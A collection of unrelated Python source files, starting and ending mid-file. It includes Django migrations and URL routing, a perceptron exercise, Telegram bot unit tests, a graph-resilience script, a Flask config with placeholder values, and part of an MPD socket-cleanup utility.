    loop.run_until_complete(
        asyncio.gather(*(print_ethbtc_ticker(id) for id in exchange_ids))
    )
|
# Generated by Django 3.1.3 on 2020-12-19 18:26
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('inventario', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ClienteModel',
fields=[
('clienteId', models.AutoField(db_column='cli_id', primary_key=True, serialize=False, unique=True)),
('clienteNombre', models.CharField(db_column='cli_nom', max_length=45)),
('clienteApellido', models.CharField(db_column='cli_ape', max_length=45)),
('clienteEmail', models.EmailField(db_column='cli_email', max_length=25, null=True, unique=True)),
('clienteInicio', models.DateField(db_column='cli_desde', default=django.utils.timezone.now)),
('clienteFono', models.CharField(db_column='cli_fono', max_length=10)),
('createdAt', models.DateTimeField(auto_now_add=True)),
('updatedAt', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Cliente',
'verbose_name_plural': 'Clientes',
'db_table': 't_cliente',
'ordering': ['clienteInicio', 'clienteNombre'],
},
),
migrations.CreateModel(
name='MascotaModel',
fields=[
('mascotaId', models.AutoField(db_column='mascota_id', primary_key=True, serialize=False, unique=True)),
('mascotaNombre', models.CharField(db_column='mascota_nomb', max_length=45)),
('mascotaFechaNacimiento', models.DateTimeField(db_column='mascota_fecnac')),
('clienteId', models.ForeignKey(db_column='cli_id', on_delete=django.db.models.deletion.PROTECT, related_name='clienteMascotas', to='clientes.clientemodel')),
('razaId', models.ForeignKey(db_column='raza_id', on_delete=django.db.models.deletion.PROTECT, related_name='razaMascotas', to='inventario.razamodel')),
],
options={
'verbose_name': 'Mascota',
'verbose_name_plural': 'Mascotas',
'db_table': 't_mascota',
},
),
]
|
import numpy as np
# Setting the random seed, feel free to change it and see different solutions.
np.random.seed(42)
def stepFunction(t):
    """Heaviside step activation: 1 when t >= 0, otherwise 0."""
    return 1 if t >= 0 else 0
def prediction(X, W, b):
    """Predict the binary class (0 or 1) of sample X given weights W and bias b.

    The step activation is applied inline: the class is 1 exactly when
    the affine score (X . W + b) is non-negative.
    """
    score = (np.matmul(X, W) + b)[0]
    return 1 if score >= 0 else 0
def perceptronStep(X, y, W, b, learn_rate=0.01):
    """Apply one pass of the perceptron update rule over the dataset.

    For every misclassified point, nudge the weights W and bias b by
    learn_rate toward (false negative) or away from (false positive)
    the point. Returns the updated (W, b).
    """
    for point, label in zip(X, y):
        error = label - prediction(point, W, b)
        if error == 1:
            # False negative: move the boundary toward the point.
            W[0] += point[0] * learn_rate
            W[1] += point[1] * learn_rate
            b += learn_rate
        elif error == -1:
            # False positive: move the boundary away from the point.
            W[0] -= point[0] * learn_rate
            W[1] -= point[1] * learn_rate
            b -= learn_rate
    return W, b
# This function runs the perceptron algorithm repeatedly on the dataset,
# and returns a few of the boundary lines obtained in the iterations,
# for plotting purposes.
def trainPerceptronAlgorithm(X, y, learn_rate=0.01, num_epochs=25):
    """Train a perceptron on (X, y) and record the boundary per epoch.

    Returns a list of (slope, intercept) pairs, one per epoch, each
    describing the decision boundary line after that epoch's updates.
    """
    # Only the maximum x-coordinate is used (it offsets the initial bias
    # so the starting boundary lies to the right of the data); the
    # original x_min / y_min / y_max locals were unused and are removed.
    x_max = max(X.T[0])
    W = np.array(np.random.rand(2, 1))
    b = np.random.rand(1)[0] + x_max
    # These are the solution lines that get plotted below.
    boundary_lines = []
    for _ in range(num_epochs):
        # In each epoch, we apply the perceptron step.
        W, b = perceptronStep(X, y, W, b, learn_rate)
        boundary_lines.append((-W[0] / W[1], -b / W[1]))
    return boundary_lines
|
# Generated by Django 2.2.1 on 2019-10-25 11:13
from django.db import migrations, models
class Migration(migrations.Migration):
    # Alters ProjectPage.phase: a 2-character choice field with an empty
    # "No phase" option and Finnish labels for the project phases
    # (Valmistelu = preparation, Kokeilu = pilot, Käytössä = in use).
    dependencies = [
        ('digi', '0023_themeindexpage_guides_and_support_header'),
    ]
    operations = [
        migrations.AlterField(
            model_name='projectpage',
            name='phase',
            field=models.CharField(blank=True, choices=[('', 'No phase'), ('PR', 'Valmistelu'), ('EX', 'Kokeilu'), ('EN', 'Käytössä')], default='', max_length=2, null=True),
        ),
    ]
|
from setuptools import setup, find_packages
# Go!
# Package metadata and dependencies for the pkpd package.
setup(
    # Module name
    name='pkpd',
    # Development pre-release version (PEP 440)
    version='0.0.1dev0',
    # License name
    license='BSD 3-clause license',
    # Maintainer information
    maintainer='David Augustin',
    maintainer_email='david.augustin@dtc.ox.ac.uk',
    # Packages and data to include
    packages=find_packages(include=('pkpd', 'pkpd.*')),
    include_package_data=True,
    # List of dependencies
    # NOTE(review): jupyter, plotly and tqdm are pinned to exact versions
    # while the rest use minimum bounds — confirm the exact pins are
    # intentional.
    install_requires=[
        'jupyter==1.0.0',
        'myokit>=1.31',
        'numpy>=1.8',
        'pandas>=0.24',
        'pints>=0.3',
        'plotly==4.8.1',
        'tqdm==4.46.1'
    ],
)
|
import unittest
from bot_top_ranking import handlers
from bot_top_ranking.utils import state, bot
from bot_top_ranking.help_functions import create_top
from unittests.conf import (
call,
message,
chat,
mock_upload_song,
user,
mock_send_message,
mock_pin_chat_message,
get_capture,
mock_state_init,
mock_unpin_chat_message,
mock_promote_chat_member,
mock_set_chat_administrator_custom_title,
mock_send_audio,
mock_download_music_link,
get_songs,
mock_promote_chat_member_raise,
mocK_get_chat_administrators
)
from unittest.mock import patch
from dotenv import load_dotenv
load_dotenv()
class TestHandlers(unittest.TestCase):
    """Tests for bot_top_ranking.handlers.

    Telegram API calls are replaced with the mocks from unittests.conf;
    the text the bot "sends" is read back with get_capture() and
    compared against the expected output.
    """

    # The /help text is asserted by two tests; one shared copy keeps the
    # two expectations from drifting apart.
    HELP_TEXT = (
        "<b>Admin commands</b>\n"
        "/disco to start poll\n"
        "/poptop [num] output referenced song (e.g. /poptop or /poptop 5)\n"
        "/finish to end poll\n"
        "/setDJ [mentioned user] set mentioned people a DJ (e.g. /setDJ @Admin)\n"
        "/settings_mp3 on|off (e.g. /settings_mp3 or /settings_mp3 on)\n"
        "/poll_status to print status of poll in this chat\n"
        "<b>User commands</b>\n"
        "/top [num] output top songs(e.g. /top 5)\n"
        "/vote [num] vote for song from poll (e.g. /vote 5)\n"
    )

    def setUp(self):
        """Build a fresh fake user/chat/message triple for every test."""
        self.User = user()
        self.Chat = chat()
        self.Message = message(self.User, self.Chat)

    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_get_help(self, mock_message):
        """/help replies with the full command reference."""
        handlers.get_help(self.Message)
        self.assertEqual(get_capture(), self.HELP_TEXT)

    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_callback_query(self, mock_message):
        """The 'help' callback button sends the same text as /help."""
        Call = call(self.User, "help", self.Chat, self.Message)
        self.assertIsNone(handlers.callback_query(Call))
        self.assertEqual(get_capture(), self.HELP_TEXT)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_create_poll(self, mock_message, smth, mock_admin):
        """/disco starts a poll and posts the numbered song list."""
        state.config['poll_started'] = False
        self.assertIsNone(handlers.create_poll(self.Message))
        capture = get_capture()
        music_poll = ''
        for idx, song in enumerate(state.config["songs"]):
            music_poll += f'{idx + 1}. {song["author"]} | {song["title"]}\n'
        self.assertEqual(capture, music_poll)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_create_poll_raise(self, mock_message, smth, mock_admin):
        """/disco while a poll is running only warns about the active poll."""
        state.config['poll_started'] = True
        self.assertIsNone(handlers.create_poll(self.Message))
        capture = get_capture()
        expected_capture = "Previous poll hasn't finished yet. Type /finish or use pined Message"
        self.assertEqual(capture, expected_capture)

    @patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_get_songs_top_list(self, mock_message, smth):
        """/top N prints the first N songs of the ranked top list."""
        params = [1, 12, 23, 567]
        state.config["songs"] = get_songs()
        state.config['poll_started'] = True
        for param in params:
            with self.subTest():
                _message = message(self.User, self.Chat, f'/top {param}'.strip())
                self.assertIsNone(handlers.get_songs_top_list(_message))
                capture = get_capture()
                music_poll = ''
                top_list = create_top(state.config["songs"])
                for idx, song in enumerate(top_list[:param]):
                    music_poll += f'{idx + 1}. {song["author"]} | {song["title"]} | {song["mark"]} Votes\n'
                self.assertEqual(capture, music_poll)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_get_songs_top_list_wrong(self, mock_message, mockk_pin, mock_admin):
        """/top rejects zero, non-numeric and missing arguments."""
        params = [0, 'qwerty', '']
        state.config['poll_started'] = False
        self.assertIsNone(handlers.create_poll(self.Message))
        self.assertTrue(state.config["poll_started"])
        for param in params:
            with self.subTest():
                _message = message(self.User, self.Chat, f'/top {param}'.strip())
                self.assertIsNone(handlers.get_songs_top_list(_message))
                capture = get_capture()
                self.assertEqual(capture, 'Incorrect input. Type /help to get information about commands')

    def test_vote_for_song(self):
        """/vote N increments the mark of song N."""
        state.config["songs"] = get_songs()
        state.config['poll_started'] = True
        song_id = 1  # song #2 because array start from 0
        begin_mark = state.config["songs"][song_id]["mark"]
        vote_message = message(self.User, self.Chat, '/vote 2')
        self.assertIsNone(handlers.vote_for_song(vote_message))
        self.assertEqual(begin_mark + 1, state.config["songs"][song_id]["mark"])

    def test_unvote_song(self):
        """Voting the same song twice takes the vote back."""
        state.config["songs"] = get_songs()
        state.config['poll_started'] = True
        song_id = 2
        begin_mark = state.config["songs"][song_id]["mark"]
        vote_message = message(self.User, self.Chat, '/vote 3')
        self.assertIsNone(handlers.vote_for_song(vote_message))
        self.assertEqual(begin_mark + 1, state.config["songs"][song_id]["mark"])
        self.assertIsNone(handlers.vote_for_song(vote_message))
        self.assertEqual(begin_mark, state.config["songs"][song_id]["mark"])

    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_pervote_song(self, mock_message):
        """/vote with an out-of-range number leaves all marks untouched."""
        state.config['songs'] = get_songs()
        state.config['poll_started'] = True
        vote_message = message(self.User, self.Chat, '/vote 88889')
        self.assertIsNone(handlers.vote_for_song(vote_message))
        self.assertFalse(any([song['mark'] for song in state.config['songs']]))
        capture = get_capture()
        expected_output = f'Number should be less than {state.config["count_music"]} and greater than 0'
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
    @patch('bot_top_ranking.help_functions._download_music_link', side_effect=mock_download_music_link)
    @patch('bot_top_ranking.handlers.bot.send_audio', side_effect=mock_send_audio)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_pop_element_from_top_notupload(self, mock_message, mock_audio, down_link, pin, mock_admin):
        """/poptop N announces the N-th song as text when uploading is off."""
        state.config["songs"] = get_songs()
        params = [1, 5, 12]
        for param in params:
            with self.subTest():
                state.config['poll_started'] = True
                poptop_message = message(self.User, self.Chat, f'/poptop {param}'.strip())
                self.assertIsNone(handlers.pop_element_from_top(poptop_message))
                capture = get_capture()
                top_list = create_top(state.config["songs"])
                expected_output = top_list[param - 1]['author'] + ' | ' + top_list[param - 1]['title']
                self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.upload_song', side_effect=mock_upload_song)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_pop_element_from_top_upload(self, mock_message, mock_upload, mock_admin):
        """/poptop N uploads the N-th song as audio when uploading is on."""
        state.config["songs"] = get_songs()
        state.config['upload_flag'] = True
        params = [1, 5, 12]
        for param in params:
            with self.subTest():
                state.config['poll_started'] = True
                poptop_message = message(self.User, self.Chat, f'/poptop {param}'.strip())
                self.assertIsNone(handlers.pop_element_from_top(poptop_message))
                capture = get_capture('upload_song.txt')
                top_list = create_top(state.config["songs"])
                expected_output = top_list[param - 1]['author'] + ' | ' + top_list[param - 1]['title']
                self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    # FIX: was `sidi_effect=` — mock.patch silently forwards unknown
    # keywords to the created MagicMock as plain attributes, so the pin
    # mock never actually executed mock_pin_chat_message.
    @patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
    @patch('bot_top_ranking.help_functions._download_music_link', side_effect=mock_download_music_link)
    @patch('bot_top_ranking.handlers.bot.send_audio', side_effect=mock_send_audio)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_pop_element_from_top_empty(self, mock_message, mock_audio, down_link, pin, mock_admin):
        """/poptop with no argument pops the current #1 song."""
        state.config["songs"] = get_songs()
        state.config['poll_started'] = True
        poptop_message = message(self.User, self.Chat, '/poptop')
        self.assertIsNone(handlers.pop_element_from_top(poptop_message))
        capture = get_capture()
        top_list = create_top(state.config["songs"])
        expected_output = top_list[0]['author'] + ' | ' + top_list[0]['title']
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.pin_chat_message', side_effect=mock_pin_chat_message)
    @patch('bot_top_ranking.help_functions._download_music_link', side_effect=mock_download_music_link)
    @patch('bot_top_ranking.handlers.bot.send_audio', side_effect=mock_send_audio)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_pop_element_from_top_unnumber(self, mock_message, mock_audio, down_link, pin, mock_admin):
        """/poptop with an out-of-range number replies with the bounds hint."""
        state.config["songs"] = get_songs()
        state.config['poll_started'] = True
        poptop_message = message(self.User, self.Chat, '/poptop 22222')
        self.assertIsNone(handlers.pop_element_from_top(poptop_message))
        capture = get_capture()
        # NOTE(review): this create_top call's result was never used; it is
        # kept in case create_top has side effects — confirm and drop it.
        top_list = create_top(state.config["songs"])
        expected_output = f'Number should be less than {state.config["count_music"]} and greater than 0'
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.unpin_chat_message', side_effect=mock_unpin_chat_message)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    @patch('bot_top_ranking.handlers.state.__init__', side_effect=mock_state_init)
    def test_finish_poll(self, mock_message, mock_state, mock_unpin, mock_admin):
        """/finish stops the poll, clears all marks and announces the end."""
        state.config["poll_started"] = True
        self.assertIsNone(handlers.finish_poll(self.Message))
        self.assertFalse(state.config['poll_started'])
        self.assertFalse(any([song['mark'] for song in state.config['songs']]))
        capture = get_capture()
        expected_output = 'Poll was finished'
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_change_upload_flag(self, mock_message, mock_admin):
        """/settings_mp3 sets, toggles or rejects the upload flag."""
        state.config["songs"] = get_songs()
        state.config['poll_started'] = True
        params = ['off', 'on', '', 123]
        for param in params:
            with self.subTest():
                change_message = message(self.User, self.Chat, text=f'/settings_mp3 {param}'.strip())
                started_upload_flag = state.config['upload_flag']
                self.assertIsNone(handlers.change_upload_flag(change_message))
                capture = get_capture()
                expected_output = f'uploading songs is <b>{"Enabled" if state.config["upload_flag"] else "Disabled"}</b>'
                if param == 'off':
                    self.assertFalse(state.config['upload_flag'])
                    self.assertEqual(capture, expected_output)
                elif param == 'on':
                    self.assertTrue(state.config['upload_flag'])
                    self.assertEqual(capture, expected_output)
                elif param == '':
                    # No argument toggles the flag.
                    self.assertTrue(not started_upload_flag == state.config['upload_flag'])
                    self.assertEqual(capture, expected_output)
                else:
                    # Invalid argument leaves the flag unchanged.
                    self.assertTrue(started_upload_flag == state.config['upload_flag'])
                    self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_get_poll_status(self, mock_message, mock_admin):
        """/poll_status prints the poll flag and upload mode."""
        self.assertIsNone(handlers.get_poll_status(self.Message))
        capture = get_capture()
        expected_output = (
            'Poll status\n'
            '———————————\n'
            f'Poll started: {state.config["poll_started"]}\n'
            f'Upload mp3: {"on" if state.config["upload_flag"] else "off"}'
        )
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_set_dj_by_user_id(self, mock_message, mock_admin):
        """/setDJ @user queues the mentioned user for promotion."""
        state.config["users_for_promoting"] = []
        user_tag = bot.get_me().username
        mentioned_message = message(self.User, self.Chat, f'/setDJ @{user_tag}')
        self.assertIsNone(handlers.set_dj_by_user_id(mentioned_message))
        self.assertEqual(state.config["users_for_promoting"][-1], user_tag)
        capture = get_capture()
        expected_output = f'@{user_tag} type /becomeDJ. It\'s privileges only for you ^_^'
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.utils.bot.get_chat_administrators', side_effect=mocK_get_chat_administrators)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_set_dj_by_user_id_incorrect(self, mock_message, mock_admin):
        """/setDJ with an empty mention is rejected."""
        mentioned_message = message(self.User, self.Chat, r'/setDJ @')
        self.assertIsNone(handlers.set_dj_by_user_id(mentioned_message))
        capture = get_capture()
        expected_output = r'Incorrect input. Type /help to get information about commands'
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.handlers.bot.set_chat_administrator_custom_title', side_effect=mock_set_chat_administrator_custom_title)
    @patch('bot_top_ranking.handlers.bot.promote_chat_member', side_effect=mock_promote_chat_member)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_become_dj(self, mock_message, mock_promote, mock_title):
        """/becomeDJ promotes a queued user and removes them from the queue."""
        user_tag = bot.get_me().username
        state.config['users_for_promoting'] = [user_tag]
        self.assertIsNone(handlers.become_dj(self.Message))
        self.assertFalse(state.config['users_for_promoting'])
        capture = get_capture()
        expected_output = f'@{user_tag} You have been promoted to DJ. Congratulate 🏆🏆🏆'
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.handlers.bot.set_chat_administrator_custom_title', side_effect=mock_set_chat_administrator_custom_title)
    @patch('bot_top_ranking.handlers.bot.promote_chat_member', side_effect=mock_promote_chat_member)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_become_dj_cannot(self, mock_message, mock_promote, mock_title):
        """/becomeDJ from a user not in the queue is refused."""
        state.config['users_for_promoting'] = ['ababababababab']
        self.assertIsNone(handlers.become_dj(self.Message))
        capture = get_capture()
        expected_output = "You cannot use this command"
        self.assertEqual(capture, expected_output)

    @patch('bot_top_ranking.handlers.bot.set_chat_administrator_custom_title', side_effect=mock_set_chat_administrator_custom_title)
    @patch('bot_top_ranking.handlers.bot.promote_chat_member', side_effect=mock_promote_chat_member_raise)
    @patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
    def test_become_dj_raise(self, mock_message, mock_promote, mock_title):
        """/becomeDJ by an existing admin triggers the joke reply."""
        state.config['users_for_promoting'] = [bot.get_me().username]
        self.assertIsNone(handlers.become_dj(self.Message))
        capture = get_capture()
        expected_output = 'You are admin. Why do you try to do it??? (╮°-°)╮┳━━┳ ( ╯°□°)╯ ┻━━┻'
        self.assertEqual(capture, expected_output)
|
from django import forms
class AddToCartForm(forms.Form):
    """Form for choosing how many copies of a book to add to the cart."""

    # FIX: this was the plain integer ``1``, which is not a form field at
    # all — the rendered form silently had no "amount" input even though
    # the original comments described a 1-99 choices field. A
    # TypedChoiceField restricts the user to 1-99 copies (a user can't
    # add less than one copy of a book or more than 99 to his cart at
    # once) and coerces the submitted string to int.
    amount = forms.TypedChoiceField(
        choices=[(i, str(i)) for i in range(1, 100)],
        coerce=int,
        initial=1,
    )

    # When True, set the cart line to exactly `amount`; when False, add
    # `amount` to the existing total. This is specified by the view, not
    # the user, so it is hidden with the forms.HiddenInput widget.
    change_amount = forms.BooleanField(required=False, initial=False, widget=forms.HiddenInput)
|
"""
Question 1
"""
import assignment2 as a
import graph_operations as go
import matplotlib.pyplot as plt
# Find probability p such that the ER graph will have approximately the
# same number of edges as the computer network.
# Python 2 script: compare the computer network's resilience against
# random ER and UPA graphs with matching node/edge counts.
NODES = 1239
EDGES = 3047
NETWORK_GRAPH = a.load_graph(a.NETWORK_URL)
# EDGE_PROB is probability p for ER graph
# (chosen so the ER graph has ~EDGES edges out of POSS_EDGES possible)
POSS_EDGES = float(NODES) * (NODES - 1) / 2
EDGE_PROB = float(EDGES) / POSS_EDGES
er_graph = a.make_er_graph(NODES, EDGE_PROB)
# AVG_OUTDEGREE is m for the UPA graph
OUTDEGREE_DICT = go.compute_out_degrees(NETWORK_GRAPH)
HALF_AVG_OUTDEGREE = int(round(go.avg_out_degree(OUTDEGREE_DICT) / 2))
upa_graph = a.make_upa_graph(NODES, HALF_AVG_OUTDEGREE)
# Random node removal orders, one per graph.
network_random = a.random_order(NETWORK_GRAPH)
er_random = a.random_order(er_graph)
upa_random = a.random_order(upa_graph)
# Resilience: size of the largest connected component after each removal.
network_resilience = go.compute_resilience(a.copy_graph(NETWORK_GRAPH), network_random)
er_resilience = go.compute_resilience(a.copy_graph(er_graph), er_random)
upa_resilience = go.compute_resilience(a.copy_graph(upa_graph), upa_random)
# Sanity-check output for each graph.
print "Network Edges:", EDGES
print "Network undirected:", a.check_undirected(NETWORK_GRAPH)
print "Check Network Edges:", a.check_number_edges(NETWORK_GRAPH)
print "res len:", len(network_resilience)
print "\nER info:"
print "p:", EDGE_PROB
print "er undirected:", a.check_undirected(er_graph)
print "Number edges:", a.check_number_edges(er_graph)
print "er res len:", len(er_resilience)
print "\nUPA info:"
print "m:", HALF_AVG_OUTDEGREE
print "upa undirected:", a.check_undirected(upa_graph)
print "Number UPA Edges:", a.check_number_edges(upa_graph)
print "upa res len:", len(upa_resilience)
def plot_resiliences(nodes, network_vals, er_vals, upa_vals):
    """
    Draw the three resilience curves (network, ER, UPA) on one labelled
    figure and display it.
    """
    removed = range(0, nodes)
    curves = [
        (network_vals, '-b', 'Network'),
        (er_vals, '-r', 'ER: p = ' + str(EDGE_PROB)),
        (upa_vals, '-g', 'UPA: m = ' + str(HALF_AVG_OUTDEGREE)),
    ]
    for vals, fmt, label in curves:
        plt.plot(removed, vals, fmt, label=label)
    plt.legend(loc='upper right')
    plt.ylabel('Size of Largest Connected Component')
    plt.xlabel('Number of Nodes Removed')
    plt.grid(True)
    plt.title('Comparison of Graph Resilience\nMeasured by Largest Connected Component vs Randomly Removed Nodes\n')
    plt.show()
# Render the comparison plot for all three graphs.
plot_resiliences(NODES, network_resilience, er_resilience, upa_resilience)
|
# -*- coding: utf-8 -*-
# Flask configuration for the funnel app.
# FIX: normalized the inconsistent PEP 8 spacing around `=` (SITE_TITLE,
# TYPEKIT_CODE, GA_CODE, ADMINS, LOGFILE had no spaces); values unchanged.
#: The title of this site
SITE_TITLE = 'HasGeek Funnel'
#: Support contact email
SITE_SUPPORT_EMAIL = 'test@example.com'
#: TypeKit code for fonts
TYPEKIT_CODE = ''
#: Google Analytics code UA-XXXXXX-X
GA_CODE = ''
#: Database backend
SQLALCHEMY_DATABASE_URI = 'sqlite:///test.db'
#: Secret key — replace with a random value in production
SECRET_KEY = 'make this something random'
#: Timezone
TIMEZONE = 'Asia/Calcutta'
#: LastUser server
LASTUSER_SERVER = 'https://auth.hasgeek.com/'
#: LastUser client id
LASTUSER_CLIENT_ID = ''
#: LastUser client secret
LASTUSER_CLIENT_SECRET = ''
#: Used for attribution when shared a proposal on twitter
TWITTER_ID = "hasgeek"
#: Mail settings
#: MAIL_FAIL_SILENTLY : default True
#: MAIL_SERVER : default 'localhost'
#: MAIL_PORT : default 25
#: MAIL_USE_TLS : default False
#: MAIL_USE_SSL : default False
#: MAIL_USERNAME : default None
#: MAIL_PASSWORD : default None
#: DEFAULT_MAIL_SENDER : default None
MAIL_FAIL_SILENTLY = False
MAIL_SERVER = 'localhost'
DEFAULT_MAIL_SENDER = ('Bill Gate', 'test@example.com')
# Required for Flask-Mail to work.
MAIL_DEFAULT_SENDER = DEFAULT_MAIL_SENDER
#: Logging: recipients of error emails
ADMINS = []
#: Log file
LOGFILE = 'error.log'
#: Messages (text or HTML)
WELCOME_MESSAGE = "The funnel is a space for proposals and voting on events. Pick an event to get started."
|
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django.urls import re_path
from django.views.static import serve
from django.conf.urls.i18n import i18n_patterns
from django.utils.translation import gettext_lazy as _
from accounts.views import IndexPageView, AboutView, ChangeLanguageView, set_timezone
# Branding for the Django admin site.
admin.site.site_header = 'CustomUser Administration'
admin.site.site_title = 'CustomUser Site Admin'
admin.site.index_title = 'CustomUser Site Admin Home'
# Routes: admin, static pages, account management, REST auth endpoints,
# i18n helpers and per-user language / timezone switching.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', IndexPageView.as_view(), name='index'),
    path('about/', AboutView.as_view(), name='about'),
    path('accounts/', include('accounts.urls')),
    path('rest-auth/', include('rest_auth.urls')),
    path('i18n/', include('django.conf.urls.i18n')),
    path('language/', ChangeLanguageView.as_view(), name='change_language'),
    path('timezone/', set_timezone, name='set_timezone'),
]
# In development only, serve static and media files straight from Django.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)
    urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
    urlpatterns += [
        re_path(r'^media/(?P<path>.*)$', serve, {
            'document_root': settings.MEDIA_ROOT,
        }),
    ]
#!/usr/bin/env python
#
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
## NOTE: we do NOT allow this pgm to run via mpdroot
"""
usage: mpdcleanup [-h] [-v] [-f <hostsfile>] [-r <rshcmd>] [-u <user>] [-c <cleancmd>] [-k 'killcmd'] [-n <num_from_hostsfile>]
or: mpdcleanup [--help] [--verbose] [--file=<hostsfile>] [--rsh=<rshcmd>] [--user=<user>]
[--clean=<cleancmd>] [--kill="killcmd"]
Removes the Unix socket on local (the default) and remote machines
This is useful in case the mpd crashed badly and did not remove it, which it normally does
"""
from time import ctime
__author__ = "Ralph Butler and Rusty Lusk"
__date__ = ctime()
__version__ = "$Revision: 1.11 $"
__credits__ = ""
import sys, os, socket
from getopt import getopt
from mpdlib import mpd_get_my_username, mpd_same_ips, mpd_set_tmpdir
def mpdcleanup():
    """Remove the mpd console Unix socket on the local machine and, when a
    hosts file is given, on each remote host as well; optionally run a
    user-supplied kill command on every host.

    Python 2 code: uses print statements and dict.has_key.
    """
    rshCmd = 'ssh'
    user = mpd_get_my_username()
    killCmd = ''    # perhaps '~/bin/kj mpd' (in quotes)
    cleanCmd = 'rm -f '
    hostsFile = ''
    verbose = 0
    numFromHostsFile = 0    # chgd below
    # Parse the command line (see the module docstring for usage).
    try:
        (opts, args) = getopt(sys.argv[1:], 'hvf:r:u:c:k:n:',
                              ['help', 'verbose', 'file=', 'rsh=', 'user=', 'clean=','kill='])
    except:
        print 'invalid arg(s) specified'
        usage()
    else:
        for opt in opts:
            if opt[0] == '-r' or opt[0] == '--rsh':
                rshCmd = opt[1]
            elif opt[0] == '-u' or opt[0] == '--user':
                user = opt[1]
            elif opt[0] == '-f' or opt[0] == '--file':
                hostsFile = opt[1]
            elif opt[0] == '-h' or opt[0] == '--help':
                usage()
            elif opt[0] == '-v' or opt[0] == '--verbose':
                verbose = 1
            elif opt[0] == '-n':
                numFromHostsFile = int(opt[1])
            elif opt[0] == '-c' or opt[0] == '--clean':
                cleanCmd = opt[1]
            elif opt[0] == '-k' or opt[0] == '--kill':
                killCmd = opt[1]
        if args:
            print 'invalid arg(s) specified: ' + ' '.join(args)
            usage()
    # MPD_CON_EXT / MPD_TMPDIR environment variables determine the exact
    # socket filename to remove.
    if os.environ.has_key('MPD_CON_EXT'):
        conExt = '_' + os.environ['MPD_CON_EXT']
    else:
        conExt = ''
    if os.environ.has_key('MPD_TMPDIR'):
        tmpdir = os.environ['MPD_TMPDIR']
    else:
        tmpdir = '/tmp'
    cleanFile = tmpdir + '/mpd2.console_' + user + conExt
    # -x disables X11 forwarding; only meaningful for ssh.
    if rshCmd == 'ssh':
        xOpt = '-x'
    else:
        xOpt = ''
    try: localIP = socket.gethostbyname_ex(socket.gethostname())[2]
    except: localIP = 'unknownlocal'
    if hostsFile:
        try:
            f = open(hostsFile,'r')
        except:
            print 'Not cleaning up on remote hosts; file %s not found' % hostsFile
            sys.exit(0)
        hosts = f.readlines()
        if numFromHostsFile:
            hosts = hosts[0:numFromHostsFile]
